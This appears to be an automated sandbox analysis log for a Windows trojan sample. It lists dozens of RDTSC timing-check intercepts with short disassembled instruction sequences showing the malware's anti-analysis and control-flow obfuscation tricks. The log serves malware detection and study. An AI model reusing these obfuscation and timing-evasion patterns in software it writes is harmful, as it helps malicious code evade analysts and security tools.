Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D32B85 second address: D32BB6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F3620DC90FEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3620DC9105h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D35072 second address: D35078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D35078 second address: D350D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F3620DC9109h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 je 00007F3620DC9101h 0x00000017 jmp 00007F3620DC90FBh 0x0000001c pop ebx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F3620DC90F8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D2B01h] 0x0000003f xchg eax, esi 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D350D9 second address: D350DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D350DD second address: D350E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D360CE second address: D360E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F362081F59Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D360E2 second address: D360E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D351C7 second address: D351D8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D381BD second address: D381C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3747A second address: D37480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D381C3 second address: D38225 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3620DC90F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F3620DC9107h 0x00000012 push 00000000h 0x00000014 movzx edi, di 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F3620DC90F8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D3309h], esi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007F3620DC90F8h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D37480 second address: D37484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3931C second address: D39346 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3620DC910Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e je 00007F3620DC90F6h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D39346 second address: D3934C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D39492 second address: D39496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D39496 second address: D394AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F362081F59Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C2DD second address: D3C366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3620DC9102h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F3620DC90F8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a movsx edi, cx 0x0000002d jnl 00007F3620DC90FFh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F3620DC90F8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f sbb edi, 101757C8h 0x00000055 xchg eax, esi 0x00000056 push ecx 0x00000057 pushad 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a jp 00007F3620DC90F6h 0x00000060 popad 0x00000061 pop ecx 0x00000062 push eax 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 pop eax 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C366 second address: D3C36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3B552 second address: D3B56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F3620DC9102h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D441 second address: D3D455 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F362081F59Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C4E4 second address: D3C4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C4E8 second address: D3C4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F362081F5A4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C4FA second address: D3C4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3F277 second address: D3F27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D402D0 second address: D402E3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3620DC90F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D402E3 second address: D402E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE397A second address: CE39B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3620DC90FDh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F3620DC90FBh 0x0000000f popad 0x00000010 js 00007F3620DC9102h 0x00000016 jbe 00007F3620DC90F6h 0x0000001c jng 00007F3620DC90F6h 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pushad 0x00000025 jo 00007F3620DC90FEh 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE39B7 second address: CE39CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A0h 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42982 second address: D42986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42986 second address: D42A21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F362081F5A4h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F362081F598h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F362081F59Bh 0x0000002c mov di, si 0x0000002f jmp 00007F362081F5A0h 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D2FECh] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F362081F598h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 jmp 00007F362081F59Ah 0x0000005d xchg eax, esi 0x0000005e pushad 0x0000005f jo 00007F362081F59Ch 0x00000065 je 00007F362081F596h 0x0000006b push eax 0x0000006c push edx 0x0000006d push ebx 0x0000006e pop ebx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42A21 second address: D42A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F3620DC90F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4054C second address: D40556 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D40556 second address: D4057A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jc 00007F3620DC90FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D5B9 second address: D3D5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42C00 second address: D42C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3620DC9107h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D5BE second address: D3D5C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D5C3 second address: D3D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F3620DC9106h 0x0000000f je 00007F3620DC90F6h 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 mov dword ptr [ebp+122D23ACh], ecx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov di, CFB2h 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 and edi, dword ptr [ebp+1246044Ah] 0x00000036 mov eax, dword ptr [ebp+122D0ADDh] 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F3620DC90F8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D5B03h], edi 0x0000005c mov ebx, dword ptr [ebp+122D2E75h] 0x00000062 push FFFFFFFFh 0x00000064 sub dword ptr [ebp+1245D9D6h], edx 0x0000006a nop 0x0000006b pushad 0x0000006c jmp 00007F3620DC9103h 0x00000071 pushad 0x00000072 jmp 00007F3620DC90FDh 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D669 second address: D3D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D44A59 second address: D44A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D44AF5 second address: D44AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D43CF1 second address: D43D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F3620DC90F8h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 00000019h 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 push dword ptr fs:[00000000h] 0x00000027 xor edi, dword ptr [ebp+122D213Bh] 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F3620DC90F8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov di, dx 0x00000051 jne 00007F3620DC90FCh 0x00000057 mov eax, dword ptr [ebp+122D15A1h] 0x0000005d or ebx, dword ptr [ebp+122D2D25h] 0x00000063 push FFFFFFFFh 0x00000065 mov bx, F629h 0x00000069 push eax 0x0000006a pushad 0x0000006b jnc 00007F3620DC90F8h 0x00000071 pushad 0x00000072 pushad 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D44AFB second address: D44B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F362081F59Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A3D second address: D45A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A42 second address: D45A56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A56 second address: D45A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A5A second address: D45AC5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D1DC9h], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F362081F598h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov di, bx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F362081F598h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d je 00007F362081F599h 0x00000053 xor bh, 00000023h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jbe 00007F362081F596h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45AC5 second address: D45ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4B007 second address: D4B010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4C5FB second address: D4C604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4C604 second address: D4C60A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4C60A second address: D4C610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D50050 second address: D5006D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5006D second address: D50073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE5537 second address: CE553B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F722 second address: D4F755 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3620DC9102h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F3620DC9102h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F755 second address: D4F75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F75B second address: D4F761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F761 second address: D4F76A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F76A second address: D4F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3620DC90F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F8CC second address: D4F8D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D51763 second address: D5176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D561E0 second address: D56204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F362081F596h 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007F362081F596h 0x00000012 jc 00007F362081F596h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007F362081F596h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D56204 second address: D5622A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jns 00007F3620DC90F8h 0x0000001c jo 00007F3620DC90FCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5622A second address: D5624E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F362081F5ABh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5624E second address: D5627C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3620DC90FFh 0x00000015 rdtsc
